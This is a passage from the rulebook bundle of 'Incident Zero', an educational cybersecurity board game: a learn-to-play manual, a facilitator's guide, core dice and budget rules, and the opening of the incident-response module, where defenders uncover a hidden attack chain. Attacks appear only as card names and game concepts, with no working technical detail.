INCIDENT ZERO

Incident Response — Print & Play Bundle · v2.2 Playtest Edition

A cybersecurity board game by RetroVerse Studios · CC BY-NC-SA 4.0

Print this file (Ctrl/Cmd+P) or read on screen. Card pages print best on cardstock.

Contents:
  1. docs/HOW_TO_PLAY.md
  2. docs/TO_GUIDE.md
  3. docs/rules/core-rules.md
  4. docs/rules/module-incident-response.md
  5. docs/standalone-games/incident-response.md
  6. cards/incident-response/core-deck/threat-defense-cards.md
  7. cards/incident-response/expansion-deck/advanced-threats.md
  8. cards/incident-response/expansion-deck/advanced-defenses.md
  9. cards/print-templates/tracker-sheets.md

docs/HOW_TO_PLAY.md

How to Play Incident Zero

Version: 2.2 - Playtest Edition Read time: ~15 minutes. First game: ~45 minutes.

This is the learn-to-play manual — read it once, run your first game, then use the module rules as reference during play. Exact tables and numbers live in the reference docs; this manual teaches the flow.


1. What Is This Game?

Incident Zero is a cybersecurity board game for classrooms and training rooms. One player is the Threat Orchestrator (TO) — part facilitator, part adversary, part narrator. Everyone else is the Blue Team: security defenders making decisions under budget and time pressure.

The game's signature rule: you get better dice odds by explaining your reasoning like a real analyst. Say "we investigate suspicious activity" and you roll flat. Say "we pull the mail gateway logs to check the sender's real IP against threat intel" and you roll at +3. Talking like a professional is literally how you win — that's the point.

There are 6 modules covering the security lifecycle. Each is a standalone 30-45 minute game; they also chain together (the outcome of one feeds the setup of the next). This manual teaches Incident Response first — it's the flagship and the best hook.

2. What You Need

3. The Core Loop (all modules)

Every module runs on the same engine:

  1. Turns. A fixed number of turns (announced at setup). Each turn: start-of-turn penalties → 2-3 minutes of team discussion → ONE team action → end of turn.
  2. Budget. One shared pool representing money, staff, and time. Every action costs Budget. Run dry and you can't act.
  3. The d20 roll. Uncertain actions need roll + modifiers ≥ 11.
  4. Justification modifiers. +2 for strong technical reasoning (methodology — why this approach works), +1 for naming real tools or techniques (Wireshark, EDR, Mimikatz, a MITRE technique). The TO judges honestly; vague = +0.
  5. Debrief. Every session ends with 5-10 minutes of "what happened, why, what would you do differently." This is where the learning locks in — don't skip it.

4. Your First Game: Incident Response (Beginner)

The setup (TO does this privately, 5 min): An attacker is inside the fictional company's network. The TO secretly builds a 3-card attack chain in kill-chain order and keeps it face-down:

Suggested first chain: T-01 Phishing Campaign (INITIAL COMPROMISE / SOCIAL ENGINEERING) → T-04 Lateral Movement via SMB (PIVOT & ESCALATE / NETWORK) → T-07 Scheduled Task Persistence (PERSISTENCE / MALWARE)

The three actions (Blue Team picks ONE per turn):

Action Cost On success (roll+mods ≥ 11)
Investigate 5 1st success on a link = the TO gives a clue. 2nd success on the same link = card revealed!
Deploy Defense 10/15/25 by tier If the card's vector AND chain step match the hidden card = revealed immediately. Partial match = defense stays on the table and gives +2 to future rolls against any link matching its vector
Emergency Response 15 No roll. Contain one already-revealed threat (removes its ongoing penalty)

The pressure (TO applies at the START of each turn): - Active Breach Cost: -5 Budget while any chain card is still unrevealed (the breach is burning money whether you see it or not) - Uncontained Threats: -5 Budget per revealed-but-uncontained threat (revealing the next card in the chain auto-contains the previous one)

When a card is revealed, the team immediately picks ONE reward: draw 2 Defense cards, +10 Budget, or Fast-Track (next Investigate succeeds on 5+).

Scripted opening — read this at the table

TURN 1. TO: "Start of turn: one attacker action is still hidden — Active Breach Cost, minus 5. Budget: 95. Something is wrong at Meridian Logistics: the helpdesk queue is full of password-reset complaints. What do you do?" Team (after discussion): "Investigate. We pull the mail gateway logs and check sender domains against our threat-intel feed — if this is phishing, the return-path won't match the display name." TO: "That's a real methodology and a real tool — +2 and +1. Roll." Rolls 9. 9+3 = 12 ≥ 11 — success. TO reads a clue from T-01: "Several employees received emails claiming to be from IT, asking them to 're-authenticate'. The link goes to a look-alike domain registered 4 days ago." (First success on this link — clue only. Budget: 95 - 5 = 90.)

TURN 2. TO: "Active Breach Cost, minus 5. Budget: 85." Team: "Keep digging on the phishing — we check the mail gateway for who clicked, and pull those workstations' proxy logs." TO: "+2, +1. Roll." Rolls 10. 13 ≥ 11 — second success on the same link. TO flips T-01 face-up: "Phishing Campaign — revealed! Three users entered credentials on the fake page. This threat is now uncontained. Choose a reward." Team takes Budget Grant: 85 - 5 + 10 = 90.

TURN 3. TO: "Two cards still hidden: Active Breach minus 5. One uncontained threat: minus 5. Budget: 80. You know how they got in — you don't yet know where they went." From here, you're on your own. (A strong play: Deploy the Network Segmentation defense — if the next hidden card is network lateral movement, vector + step match reveals it instantly and auto-contains the phishing.)

How it ends

Debrief prompts: What did you spend the most on, and was it worth it? Which clue actually changed your next decision? What one defense, bought before turn 1, would have changed everything?

5. The Other Five Modules (one paragraph each)

Chaining modules: outcomes carry forward (audit gaps raise your DR costs; an IR loss sets up DR; IR's revealed chain seeds Forensics). See Module Combinations. Full lifecycle = all six in sequence, 4-5 hours across sessions.

6. Where to Go Next

You want... Read
You're the Threat Orchestrator The TO Guide — the role, judging justifications, per-module screens
Exact rules for a module docs/rules/ — core + one file per module
Solo/standalone setup for any module docs/standalone-games/
Every card, indexed cards/CARD_REFERENCE.md
To run a playtest and report back docs/playtesting/
Variable game length & difficulty tiers core-rules §3a

7. Quick Reference (photocopy this)

Roll: d20 + modifiers ≥ 11 · +2 strong justification · +1 real tool/technique named · +2 matching deployed defense (IR) IR costs: Investigate 5 · Deploy 10/15/25 · Emergency Response 15 IR start-of-turn: -5 while any card hidden · -5 per uncontained revealed threat Reveal: 2 successful Investigates on a link, or 1 full-match Deploy (vector + step) · always the earliest unrevealed card Reward per reveal (pick 1): 2 Defense cards / +10 Budget / next Investigate succeeds on 5+ Turn limit: (chain cards × 2) + 1 → 3 cards = 7 turns Budgets: NB 40-60 · DR 50 · Forensics 75 · IR 100 · Audit 100 · Hardening 150

docs/TO_GUIDE.md

The Threat Orchestrator's Guide

Version: 2.2 - Playtest Edition Audience: anyone about to run Incident Zero — teacher, trainer, or the friend who volunteered.


1. The Role

The Threat Orchestrator (TO) is Incident Zero's dungeon master. You wear three hats, usually in the same minute:

If you've ever run a tabletop RPG, you already have 80% of this. The remaining 20% is the adjudication rubric in §4 — it's the part that makes this game educational rather than just thematic.

A good TO makes the game. The same scenario is flat or unforgettable depending on how you deliver clues and how honestly you judge reasoning. That's why this guide exists.

2. Golden Rules

  1. Be fair, not nice. Never fudge dice — in either direction. The rules already give you legitimate difficulty dials (§5); use those, not your thumb on the d20.
  2. Never block on ignorance. If players are stuck, sell them a hint through the fiction ("your SOC junior suggests looking at outbound traffic...") rather than letting three turns die in silence.
  3. Announce costs before actions. "That's 15 Budget — confirm?" prevents every argument you'd otherwise have.
  4. Explain outcomes. Success or failure, say why in security terms. The explanation is the lesson; the roll is just pacing.
  5. Keep the clock. 2-3 minutes of planning per turn, firmly. Deliberation past that point is quarterbacking, not strategy.
  6. Let them be wrong. A confidently wrong plan that fails teaches more than a corrected plan that succeeds. Save the correction for the debrief.

3. Session Prep (15 minutes)

4. Judging Justifications (the heart of the job)

The +2/+1 modifiers are the game's teaching engine. Your consistency is what makes them meaningful.

+2 — Strong technical justification. The player explains methodology: what they'll look at, and why that would reveal or stop this specific thing. - ✅ "We pull the mail gateway logs and compare the return-path against the display-name domain — spoofed senders won't match." (mechanism stated) - ✅ "Deploy EDR because living-off-the-land attacks won't trip signature AV — we need behavioral detection." (threat-to-control logic) - ❌ "We investigate the email server thoroughly." (a location is not a method)

+1 — Real tool or technique named. Wireshark, Splunk queries, Mimikatz, a MITRE technique ID, an actual CVE. - ✅ "Check LSASS access events — that's Mimikatz behavior, T1003." - ❌ "We use our security tools." (no it isn't)

Rulings that keep it fair: - Judge the reasoning, not the vocabulary. A beginner saying "check if the email really came from who it says" in plain words has the mechanism — award the +2. A buzzword salad without a mechanism gets +0. - Consistency beats generosity. Whatever bar you set on turn 1 is the bar all game. - Escalate the bar as the group learns — by session three, "we check the SIEM" that earned +1 in session one should need a specific query. Announce the escalation openly ("you're professionals now — I want specifics"). - Expert groups ("Expert Mode"): award +2 only for named artifacts, ATT&CK technique IDs, or detection logic. This is the challenge ceiling for practitioner tables — the card math never has to change. - One player monologuing every justification? Ask a different player to give it each turn ("Sam, you're on comms — why does this matter to the regulator?").

5. Difficulty Dials (live, legitimate)

Signs it's too easy: no failed rolls; goal in sight with 40+ Budget spare; players bored. Signs it's too hard: no progress for 3+ turns; consecutive failures; frustration replacing discussion.

Easier (pick 1-2) Harder (pick 1-2)
Richer clues (more specific detail per success) Vaguer clues (accurate but terse)
Suggest an angle through the fiction Expert-mode justification bar
Shorter chain / lower tier next game Longer chain, expansion cards
Beginner budgets (module max) Minimum budgets

Never adjust by fudging a roll or changing a printed number mid-game — players smell it, and it teaches that outcomes are arbitrary.

6. Failure Modes (yours, not theirs)

Failure Symptom Fix
The Encyclopedia You lecture after every roll One sentence of "why," save the rest for debrief
The Softie Everyone always gets +2 Re-read §4; require the mechanism
The Sphinx Clues so cryptic nobody moves Clues must be actionable: each should suggest at least one sensible next investigation
The Railroader You steer them to your solution Multiple paths are valid; score the outcome, not the route
The Accountant You narrate numbers, not events Lead with fiction, then state the numbers
The Rusher Debrief skipped because time ran out Protect the last 10 minutes like it's the win condition — it is

7. Module Panels (your screen, one per module)

🔎 Incident Response — you are the hidden attacker

🛡️ Hardening — you become the pentester mid-game

🏗️ Network Building — you are the demanding business

🚨 Disaster Recovery — you are the crisis itself

🔬 Forensics — you are the evidence

📋 Audit & Compliance — you are the organization under review

8. Running the Debrief (10 minutes, non-negotiable)

Three rounds, in order: What happened? (players narrate, you correct only facts) → Why did it work that way? (connect two or three key moments to real-world security — this is where you finally get to lecture, briefly) → What would you do differently? (go around the table; everyone answers). Losses debrief better than wins: read any unrevealed cards' "Why This Works" text aloud — it's the payoff for losing.

9. First Session? Do This

  1. Run beginner Incident Response with the scripted opening in How to Play §4 — your first two turns are literally written out
  2. Keep the tracker sheet visible to everyone; public state builds trust in your fairness
  3. Log frictions on the session notes form — your confusion is playtest data too
  4. Forgive yourself one rules mistake per session; announce it, fix it forward, don't replay

docs/rules/core-rules.md

Incident Zero: Core Rules & Mechanics

Version: 2.2 - Playtest Edition Last Updated: October 2025


Core Concept 🎯

Incident Zero is a modular cybersecurity board game for 2+ players designed for educational environments. One player acts as the Threat Orchestrator (TO) (the facilitator), while all other players form Blue Teams (the Defenders).

How It Works

Players choose which module(s) to play based on learning objectives:

  1. Network Building Module - Design and secure infrastructure (30-45 min)
  2. Hardening Module - Build defense-in-depth (30-45 min)
  3. Incident Response Module - Detect and investigate hidden attack chains (30-45 min)
  4. Disaster Recovery Module - Manage breach crisis (30-45 min)
  5. Forensics Module - Investigate and attribute attacks (30-45 min) NEW in v2.1
  6. Audit & Compliance Module - Conduct security assessments (30-45 min)

Modules can be played solo or combined in any sequence using the modifier generation procedures documented in FRAMEWORK.md and Module Combinations.


Game Components (Universal)

Card Types

Threat Cards

Represent attacker actions. Each card includes: - Title: e.g., "Phishing Campaign" - Attack Chain Step: INITIAL COMPROMISE, PIVOT & ESCALATE, PERSISTENCE, or C2 & EXFIL - Attack Vector: SOCIAL ENGINEERING, WEB EXPLOIT, CREDENTIAL ABUSE, MALWARE, NETWORK, or DATA EXFIL - Clue: Descriptive text for the Threat Orchestrator - Why This Works: Educational explanation (revealed after discovery)

Deck Composition: - 12 Base Threat Cards (see cards/incident-response/core-deck/threat-defense-cards.md) - 8 Expansion Threat Cards (see cards/incident-response/expansion-deck/advanced-threats.md)


Defense Cards

Represent security controls. Each card includes: - Title: e.g., "Multi-Factor Authentication" - Countermeasure Vector: One of the six attack vectors - Tier: BASIC (10 Budget), ADVANCED (15 Budget), or ELITE (25 Budget) - Description: What the defense does and when it applies

Deck Composition: - 24 Base Defense Cards (see cards/incident-response/core-deck/threat-defense-cards.md) - 19 Expansion Defenses (see cards/incident-response/expansion-deck/advanced-defenses.md)

Examples: - BASIC: Email Authentication Setup, User Security Training, Firewall Rules (10 Budget) - ADVANCED: Multi-Factor Authentication, EDR, Network Segmentation (15 Budget) - ELITE: Threat Hunting, Memory Forensics, Deception Technology (25 Budget)


Pentester Tactic Cards

Represent sophisticated attack techniques used in Hardening module (and potentially others).

8 Core Tactics (PT-01 to PT-08): 1. PT-01: Social Engineering - Pretexting Attack 2. PT-02: Malware Evasion - Living-off-the-Land Technique 3. PT-03: Credential Dumping - Mimikatz Attack 4. PT-04: Lateral Movement - Network Traversal 5. PT-05: Privilege Escalation - Unpatched Kernel Exploit 6. PT-06: Data Exfiltration - Unmonitored Channel 7. PT-07: Supply Chain Compromise - Trusted Software Update 8. PT-08: Insider Threat - Malicious Administrator

See cards/hardening/core-deck/pentester-tactic-cards.md for full card text, plus 8 expansion tactics (PT-09 to PT-16) in advanced-tactics.md.


Asset Cards

Simple cards providing scenario context. Examples: - Email Server - Customer Database - Domain Controller - Web Application - Backup System - Developer Workstation


Game Materials Required

Physical Components: - One 20-sided die (d20) - Turn Tracker (paper or board, counts 1-12+) - Budget Tracker (shows 0-150+) - Reputation/Security Score Tracker (shows 0-100) - Uncontained Threats Tracker (shows 0-5) - Tokens or counters (for tracking upgrades, penalties)

Optional: - Score sheets (printable or paper) - Playbook tracking sheet - Stakeholder communication log (for Disaster Recovery)


Universal Game Mechanics

1. The d20 Roll System

When Used: Investigation, Defense Deployment, Negotiation, and similar actions that have uncertain outcomes.

How It Works: 1. Player announces action and parameters 2. Player rolls 1d20 (one 20-sided die) 3. Compare result to target number (usually 11+) plus modifiers 4. Success if: roll + modifiers ≥ target number

Example:

Action: Investigate email headers
Target: 11+
Roll: 7
Modifiers: +2 (technical justification) +1 (referenced Splunk)
Calculation: 7 + 2 + 1 = 10
Result: FAIL (10 < 11)

2. Budget System (Universal)

What is Budget? Abstract resource representing time, money, personnel, and tools. Spent to take actions, buy defenses, or conduct investigations.

Budget Allocation by Module: - Network Building: Start at 40-60 (by difficulty; see module rules) - Hardening: Start at 150 (or carry over from IR) - Incident Response: Start at 100 - Disaster Recovery: Start at 50 (emergency fund) - Forensics: Start at 75 - Audit & Compliance: Start at 100 (used only for optional remediation cards)

Budget Spending: - Investigate action: 5 Budget - Deploy Defense: 10/15/25 Budget (by tier) - Emergency Response (IR): 15 Budget (v2.2; was 25) - Active Breach Cost (IR, v2.2): -5 Budget at start of each turn while any chain card remains unrevealed - Harden Upgrade (Hardening): 5 Budget - Create Playbook (Hardening): 10 Budget - Crisis Action cards (DR): 5-20 Budget per card (ACTION-01 to ACTION-12; the free "Holding Statement" costs 0) - Ransom Decision (DR, ACTION-13): Pay 20 / Negotiate 5 / Refuse 0

Budget = 0: Team loses (cannot take further actions)

Exception (Disaster Recovery, v2.2): Budget floor is 0 and the free Holding Statement action remains available — DR is never lost by running out of Budget; DR's loss condition is any stakeholder trust reaching 0%.


3. Turn System (Universal)

Turns represent: Time passing in the game world (6 hours, 30 minutes, or abstract unit depending on module)

Turn Sequence: 1. Start of Turn: Penalties applied, trackers announced 2. Planning Phase: Team discusses strategy (2-3 min) 3. Action Phase: Execute chosen action, resolve rolls 4. End of Turn: Advance tracker, draw card, check events


3a. Variable Game Length System (v2.1 - New!)

Philosophy: In real incident response, some attacks move fast (hours), some take months. Fixed turn lengths feel unrealistic. This system adds realism without requiring complex calculations.

For Beginners & Quick Play: Default Formula

Default Formula: (Attack Chain Cards × 2) + 1

This gives attackers enough time to progress realistically while keeping games manageable:

Attack Chain Formula Turn Count Session Duration
3 cards (3 × 2) + 1 7 turns 30-40 min play
4 cards (4 × 2) + 1 9 turns 35-45 min play
5 cards (5 × 2) + 1 11 turns 40-50 min play
6 cards (6 × 2) + 1 13 turns 45-55 min play

How to Use Default Formula: 1. Choose number of threat cards in attack chain (3, 4, 5, or 6) 2. Apply formula: (Cards × 2) + 1 = Turn Count 3. Announce turn count to Blue Team 4. Play game normally with that turn limit

Example Setup:

"I've created a 4-card attack chain. That's (4 × 2) + 1 = 9 turns. You have 9 turns to detect all four threats. Go!"


For Advanced Players: Complexity Tiers (v2.1)

Advanced Threat Orchestrators can use a Tier + d4 system for more control and variability:

Step 1: Select Attack Complexity Tier

Tier Turn Base Attack Profile Example
TIER 1 5-7 Simple & obvious Script kiddie using public tools
TIER 2 8-10 Standard sophistication Organized cybercriminal group
TIER 3 11-13 Highly sophisticated APT with operational security
TIER 4 14-16 Expert/Nation-state State-sponsored group

Step 2: Add Randomness (Optional)

Roll 1d4 for variation: - Roll 1: -1 turn (tight timeline) - Roll 2 or 3: ±0 turns (no change) - Roll 4: +1 turn (extended dwell time)

Final Turn Count = Tier Base + d4 Result

Example Advanced Setup:

"This is a TIER 2 attack (organized cybercriminals). Base is 8-10 turns. I'll roll d4 for variation... [rolls 4, +1 turn]. Final turn count: 9-11 turns."


Critical Game Integrity Rules (v2.1)

These rules protect game balance and prevent metagaming:

Rule 1: Accept Any Roll (Even If It Feels Wrong)

The Rule: Threat Orchestrators MUST accept the random result, even if it feels impossibly tight or loose.

Why: Real incident response is unpredictable. Sometimes attacks happen faster or slower than expected.

Example Scenarios: - TIER 3 attack (11-13 base) + d4 roll of 1 = 10-12 turns (tighter than expected, but realistic) - TIER 1 attack (5-7 base) + d4 roll of 4 = 6-8 turns (easier conditions, but acceptable)

When Chaos Feels Realistic: - Tight timeline: "The attacker worked faster than expected—they had prior knowledge" - Loose timeline: "The attacker was cautious, spending weeks in reconnaissance before striking"

Implementation: Lean into the randomness as realistic incident variability.


Rule 2: Players Cannot Question Tier Based on Turn Count

The Rule: Blue Team CANNOT deduce the attack tier from the announced turn count. They cannot ask "Is this TIER 2?" or "Is this TIER 4?" based on how many turns they have.

Why: Real incident response doesn't come with difficulty labels. Attackers don't advertise sophistication. Players should discover complexity through gameplay (attack chain complexity, defender evasion, tool sophistication, etc.).

What Players CAN Ask: - "What are the suspicious network events?" (leads to understanding threats) - "Can we analyze the malware?" (reveals attacker sophistication through findings) - "Why did this attack succeed?" (post-game discussion)

What Players CANNOT Ask: - "Is this a TIER 2 attack?" (deriving tier from turn count) - "This looks like a TIER 1 because we have 7 turns" (meta-gaming difficulty)

Implementation: Respond to difficulty questions by saying "Investigate and find out!" Players discover sophistication through evidence, not from turn counts.


Rule 3: TO Modifier Authority (Rare & Optional)

The Rule: ONLY after rolling d4, the Threat Orchestrator may apply an optional ±1 turn adjustment IF the rolled result feels genuinely unreasonable for the scenario.

When to Use (Rare): - Scenario setup is unusually complex (multiple attack vectors, coordination across systems) - Player group is new and needs slightly easier conditions - Real-world incident being taught had specific timeline constraints

When NOT to Use (Prefer Random): - "The roll feels unlucky" (accept the chaos) - "I want this exactly 10 turns" (let dice decide) - "The attack chain is long so it should take longer" (that's what TIER system handles)

Implementation: 1. Roll d4 normally 2. Announce rolled result 3. ONLY IF genuinely unreasonable, apply ±1 modifier and explain why 4. Document the override for consistency in future scenarios

Example Valid Use:

"TIER 2 base 8-10, rolled -1 = 7-9 turns. That's tight given we have 5-card attack chain, so I'm adding +1 modifier (explaining the discovery is methodical). Final: 8-10 turns."

Example Invalid Use:

"I rolled 8-10 but I want 10-12, so I'm adding +2." (NO - use the roll as-is)


Implementation Checklist

For Beginners (Use Default Formula): - [ ] Choose attack chain length (3, 4, 5, or 6 cards) - [ ] Calculate: (Cards × 2) + 1 - [ ] Announce turn count - [ ] Play

For Advanced (Use Tier + d4): - [ ] Select TIER (1, 2, 3, or 4) - [ ] Announce TIER basis (not the number, just why it's that complexity) - [ ] Roll d4 for variation (hidden or public, your choice) - [ ] Calculate final turn count - [ ] Apply Rule 3 modifier if genuinely needed (rare) - [ ] Announce final turn count WITHOUT revealing tier


Quick Reference Card

Default Formula: Turn Count = (Attack Cards × 2) + 1

Tier System: - TIER 1: 5-7 turns (simple) - TIER 2: 8-10 turns (standard) - TIER 3: 11-13 turns (advanced) - TIER 4: 14-16 turns (expert) - Add d4 roll: -1, 0, 0, or +1

Golden Rules: 1. Accept any roll (embrace chaos) 2. Never reveal tier to players 3. Modifier authority only when truly needed (rare)


4. Roll Modifiers (Universal)

All modules use the same modifier system for consistency:

+2 Bonus: Strong Technical Justification

Awarded when a player provides clear, specific reasoning for their action using real security concepts.

Examples: - "We're analyzing email headers in the mail gateway logs to identify the true sender IP and check it against threat intelligence feeds" - "We're deploying EDR on all endpoints because it can detect living-off-the-land techniques" - "We're querying our SIEM for scheduled task creation events because attackers use them for persistence"

Criteria: - References specific tools (Splunk, EDR, SIEM, etc.) - Explains methodology (why this approach works) - Shows understanding of the threat being addressed


+1 Bonus: Real Tools or Techniques Referenced

Awarded when player references actual security tools or real attack/defense techniques.

Examples: - "We'll use Wireshark to analyze the network traffic" - "We're checking for Mimikatz usage in memory" - "We're reviewing EDR telemetry" - "We're looking for this specific CVE exploitation pattern"

Criteria: - References real tools (Wireshark, EDR, Splunk, etc.) - References real techniques (MITRE ATT&CK, specific CVEs) - Shows awareness of how things actually work


5. Uncontained Threats Penalty (Incident Response Module)

When Applied: Incident Response module only, applied at START of each turn

How It Works: 1. When a threat card is revealed, add 1 to Uncontained Threats Tracker 2. At START of each turn, deduct 5 Budget per uncontained threat 3. When next card in chain is revealed, previous threat is auto-mitigated (-1 from tracker) 4. When Emergency Response action is used (15 Budget), remove a revealed threat (-1 from tracker)

Companion rule — Active Breach Cost (v2.2): while at least one chain card remains unrevealed, deduct an additional flat -5 Budget at the start of each turn. Hidden attackers cost money too.

Purpose: Creates urgency - dwell time costs money, whether you've found the attacker yet or not. Teaches real-world incident response costs.

Example (uncontained penalty only; Active Breach Cost also applies while cards remain hidden):

Turn 1: Phishing revealed → Uncontained Threats = 1
Turn 2: START → Deduct 5 Budget (95 remaining from 100)
Turn 3: Lateral Movement revealed → Phishing auto-mitigated (Uncontained = 1)
Turn 3: START → Deduct 5 Budget
Turn 4: Emergency Response on Lateral Movement (15 Budget) → Uncontained Threats = 0

Common Roles & Responsibilities

Threat Orchestrator (Facilitator)

Responsibilities: - Manage game state and track turns/budget - Describe scenarios and outcomes - Roll dice when action outcomes are uncertain - Guide the narrative

During Incident Response: - Create and manage hidden attack chain - Provide clues based on successful investigations - Control Uncontained Threats penalties - Be fair but challenging

During Other Modules: - Describe threat context and defenses - Draw Pentester Tactic cards (Hardening) - Manage timeline and deadlines (Disaster Recovery) - Guide debrief questions

Universal Tips: - Explain why actions succeed or fail - Ask clarifying questions about player strategy - Balance challenge with learning - Provide constructive feedback


Blue Team (Defenders)

Responsibilities: - Discuss strategy as a team - Choose one action per turn - Justify your decisions (gain +2 modifier) - Manage budget carefully - Learn from success and failure


Modifier Stacking Rules

Key Rule: Modifiers are additive and can stack.

Example (Hardening Module, canonical formula — v2.2):

Pentester Tactic: PT-02 Living-off-the-Land (DC 13)

Defense roll = d20
  + printed bonus for the ONE defense chosen (D-08 EDR vs PT-02: +3)
  + hardening upgrades on that defense (+2 each; one upgrade: +2)
  + relevant playbook (+3)

Team rolls 8:
8 + 3 (EDR) + 2 (upgrade) + 3 (playbook) = 16 ≥ 13 = SUCCESS

Only the single chosen defense's printed bonus applies — deployed defenses do not stack with each other against one tactic.


Difficulty & Scaling

By Attack Chain Length

Length Difficulty Best For
3 cards Beginner Learning mechanics, 30 min sessions
4 cards Intermediate Standard play, 40 min sessions
5 cards Advanced Challenge play, full kill chain

By Starting Budget

Budget Difficulty Best For
60 Hard Resource scarcity, tough choices
100 Standard Balanced play, most scenarios
150+ Easy Strategic depth, multiple options

By Turn Limit

Turns Difficulty Best For
8 Hard Time pressure, fast play
10 Standard Balanced, most scenarios
12 Easy Exploration, learning

Note (v2.2): Incident Response derives its turn limit from the Variable Game Length formula — (Attack Chain Cards × 2) + 1 → 7/9/11 turns (see §3a). The table above is for modules with educator-set limits.


Educational Objectives

By Module

Module Primary Learning Secondary Learning
Incident Response Cyber kill chain, attack detection, investigation Resource prioritization, incident response
Hardening Defense-in-depth, layering, proactive security Cost-benefit analysis, security architecture
Disaster Recovery Crisis management, stakeholder communication Risk assessment, incident cost
Network Building Network design, asset security, architecture Infrastructure hardening, threat modeling
Forensics Digital forensics, chain of custody, attribution Evidence handling, MITRE ATT&CK mapping
Audit & Compliance Security assessment, governance, compliance Risk identification, remediation prioritization

By Game Mechanic

Mechanic What It Teaches
d20 roll system Uncertainty, risk, informed decision-making
Budget constraints Resource allocation, prioritization
Justification bonuses Technical reasoning, tools/techniques knowledge
Uncontained Threats penalty Urgency, cost of dwell time
Pentester Tactics Attacker sophistication, defense limitations
Playbook system Preparation, incident response planning
Scoring systems Outcome measurement, quality assessment

Cooperative vs. Competitive Play

Cooperative Mode

Competitive Mode

Implementation: - Same setup for all teams - Teams cannot share information (Incident Response) - Score comparison determines winner (Hardening) - Reputation comparison (Disaster Recovery)


Debrief & Reflection (Universal)

Every module should include a 5-15 minute debrief with three sections:

Part 1: What Happened?

Part 2: Why Did That Happen?

Part 3: What Would You Do Differently?


Tips for Threat Orchestrators (Universal)

Before the Game

  1. Read the module rules completely - Know what's coming
  2. Prepare your scenario - Pre-build attack chain or threat context
  3. Organize materials - Sort cards, prepare trackers
  4. Know your balancing points - Be ready to adjust difficulty if needed
  5. Practice reading clues - Deliver them dramatically!

During Gameplay

  1. Be clear about costs - Announce Budget before action
  2. Resolve rolls immediately - Announce target, let player roll, resolve
  3. Ask clarifying questions - "Why are you investigating email headers?"
  4. Be fair but challenging - Give honest difficulty, don't fudge rolls
  5. Narrate outcomes - Describe what happens, not just success/failure
  6. Manage pacing - Keep turns moving (2-3 min discussion max)
  7. Track penalties accurately - Keep budget, turn, and threat trackers visible

Balancing Difficulty

Too Easy Signs: - Team reveals all cards/achieves goal with 40+ budget remaining - No failed rolls - No meaningful decisions required - Team is bored

Too Hard Signs: - Team is stuck/making no progress after 5 turns - Multiple consecutive failed rolls - Team frustrated rather than challenged - No learning happening

Adjustment Options: - Easier: Provide better clues, more starting budget, fewer tactics - Harder: Less specific clues, lower budget, more tactics - Faster: Shorter turn limits, simpler scenarios - Slower: More turns, more complex scenarios


Card Reference

For complete card descriptions, see: - Base Threat & Defense Cards cards/incident-response/core-deck/threat-defense-cards.md - Expansion Threats cards/incident-response/expansion-deck/advanced-threats.md - Expansion Defenses cards/incident-response/expansion-deck/advanced-defenses.md - All decks indexed cards/CARD_REFERENCE.md


Module-Specific Rules

For complete rules on each module:


Quick Reference: Universal Mechanics

d20 Roll System

Budget System

Turn System

Penalties & Bonuses


Continuing to Next Steps

For your first game: 1. Choose a module from Module Combinations 2. Read the module-specific rules 3. Read the standalone setup guide 4. Prepare your scenario 5. Play!

For multiple modules: 1. Refer to Module Combinations for recommended sequences 2. Refer to FRAMEWORK.md for modifier generation procedures 3. Play first module, generate modifiers for next 4. Continue as desired


Need Help?


Incident Zero: Core Rules & Mechanics v2.1 - Balanced & Refined Edition Universal rules for all modules

docs/rules/module-incident-response.md

Incident Response Module: Rules & Mechanics

Version: 2.2 - Playtest Edition Last Updated: July 2026


Module Overview

The Incident Response Module is the foundation of Incident Zero. Players act as a security operations center (SOC) team responding to an active cyberattack. The core challenge: reveal a hidden attack chain before time runs out or budget is exhausted.

This module teaches: - Primary: Cyber kill chain understanding, threat detection, evidence gathering - Secondary: Resource prioritization, incident response under pressure, forensic investigation

Key Mechanics: - Hidden attack chain (3-5 Threat Cards) is pre-built by the Threat Orchestrator - Blue Team reveals cards by successful investigation (two successes on the same chain link, v2.2) or by deploying a vector+step-matching defense - Uncontained Threats Penalty creates urgency—revealed threats cost 5 Budget per turn until contained - Active Breach Cost (v2.2)—while any chain card remains hidden, the breach itself costs 5 Budget per turn (dwell time is never free) - Emergency Response action provides a way to contain uncontained threats (15 Budget, v2.2)


Module Setup (5 minutes)

1. Choose Difficulty Level

Turn limits use the Variable Game Length formula from Core Rules §3a: Turn Limit = (Attack Chain Cards × 2) + 1.

Difficulty Chain Length Starting Budget Turn Limit Best For
Beginner 3 cards 100 7 turns First playthrough, basic learning
Intermediate 4 cards 100 9 turns Standard play, mixed experience
Advanced 5 cards 100 11 turns Experienced players, challenge

Scaling Notes: - Beginner: ~30 min session, teaches full kill chain with comfortable pace - Intermediate: ~40 min session, requires focused investigation strategy - Advanced: ~45 min session, demands efficient resource allocation and quick thinking - Advanced Threat Orchestrators can instead use the Tier + d4 system in Core Rules §3a

2. Threat Orchestrator Preparation

Create the Hidden Attack Chain: 1. Select 3-5 Threat Cards from the deck 2. Arrange them in logical attack chain sequence: - First card: INITIAL COMPROMISE - Middle cards: PIVOT & ESCALATE, PERSISTENCE - Final card: C2 & EXFIL 3. Write down clues for each hidden card on separate paper (keep hidden from Blue Team) 4. Place relevant Asset Cards on the table (visible to all—provides scenario context). Asset Cards are shared components: see cards/network-building/core-deck/asset-cards.md

Attack Chain Strategy Tips: - Start simple (Beginner): Phishing → Lateral Movement → Database Exfil - Intermediate: Phishing → Credential Dumping → VPN Access → Persistence → C2 Beaconing - Advanced: Web Exploit → Lateral Movement → Privilege Escalation → Data Staging → Exfiltration

Recommended First-Time Scenario (3 cards, 30 minutes): 1. T-01: Phishing Campaign (INITIAL COMPROMISE - SOCIAL ENGINEERING) 2. T-04: Lateral Movement via SMB (PIVOT & ESCALATE - NETWORK) 3. T-10: SQL Database Exfiltration (C2 & EXFIL - DATA EXFIL)

3. Blue Team Setup

Initialize trackers and materials:

Item Starting Value
Turn Tracker 1
Budget Tracker 100
Uncontained Threats Tracker 0
Defense Cards Draw 5 (face down)

4. Read the Opening Scenario

Threat Orchestrator delivers opening narrative using only the first hidden card's clue. Example:

"Your security operations center is monitoring the network when alerts begin firing. Your SIEM shows suspicious email traffic coming from your IT department domain, but the headers look spoofed. Several employees have reported clicking links in emails they thought came from IT requesting password resets.

You have limited time and budget to investigate before the attacker escalates. What do you do?"


Gameplay Loop (25-35 minutes)

Round Structure

Each turn represents approximately 2-4 hours of incident response operations.

COMPLETE TURN SEQUENCE:

